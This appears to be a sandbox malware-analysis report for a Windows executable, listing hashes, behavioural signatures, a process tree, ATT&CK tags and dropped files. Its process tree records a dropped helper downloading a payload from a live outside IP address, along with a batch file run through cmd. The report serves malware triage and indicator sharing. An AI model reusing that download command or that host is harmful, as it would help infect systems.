ed8b78accaf3687b64236859401bf2df4b1f118b0aa44aa58cec1e4418199ec8

Analysis

max time kernel
117s
max time network
117s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
11/07/2024, 22:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe
Size

90KB
MD5

3b064b859c44a60d05e9c9107fccef9f
SHA1

49b865d26c49a3a588dd244160e49b58bb046ffb
SHA256

ed8b78accaf3687b64236859401bf2df4b1f118b0aa44aa58cec1e4418199ec8
SHA512

4d6f97508c37fbbd50ed18783e36a69f3e97a692acb42ae67c5a5d731343933c655748d9bf550c2eae62147d2b92b1e535ce5abe99ccb87b18f336c1f81064d4
SSDEEP

1536:IabFGjiGBC2QwQB1Gh9jNkt5G3CXLSTRfQ+QWgChE1PcbZ7lG++XMQ:9ZGuAC9dB10J+5e+LkJaWE097lG+kf

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2964	GEC72-tmp.exe

Loads dropped DLL 3 IoCs

pid	Process
2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe
2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe
2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 2964	2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe	30
PID 2128 wrote to memory of 2964	2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe	30
PID 2128 wrote to memory of 2964	2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe	30
PID 2128 wrote to memory of 2964	2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe	30
PID 2128 wrote to memory of 1148	2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe	33
PID 2128 wrote to memory of 1148	2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe	33
PID 2128 wrote to memory of 1148	2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe	33
PID 2128 wrote to memory of 1148	2128	3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe	33

C:\Users\Admin\AppData\Local\Temp\3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Users\Admin\AppData\Local\Temp\GEC72-tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\GEC72-tmp.exe" http://78.129.166.25/drv32.data "C:\Users\Admin\AppData\Local\Temp\GEC73-tmp"
  2⤵
  - Executes dropped EXE
  PID:2964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\amp.bat" "
  2⤵
  PID:1148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GEC72-tmp

Filesize
89KB

MD5
9d520220399f61297cb7aba9f37f8d27

SHA1
d06608d8425b586b8bf83a9fa836b16b113ebbd1

SHA256
6c00076abb293e657935e149312893ed40839c8034d38c76ab1aeccc6fc7910e

SHA512
51500da7bc388c4772b627701d43275baaead00f4af229a24a243ce26f366c8ef56bebee9949cefd2d51598b93c4d6c1c7d186eeb78815830f3506106f5ec892

Download Submit
C:\amp.bat

Filesize
51B

MD5
d807cf6ab276eeffe1c58bf4bd7b4e11

SHA1
4c4728a9fc17d945778e352863d76d6400b3facc

SHA256
b7db48ab7046fcdd8030989572bb3fb7d150773004841b9b8797b6eb392f6628

SHA512
eb7ea24bee7a774b0e816ac9f4860f8cf6eb24813dad39ddd3d127465c15ae94d16380d28a98c6aedca5e3f2d4e7c0075d00b123e415a3748f3da7ebf0fd2873

Download Submit
memory/2128-0-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2128-19-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2128-39-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2964-20-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/2964-27-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download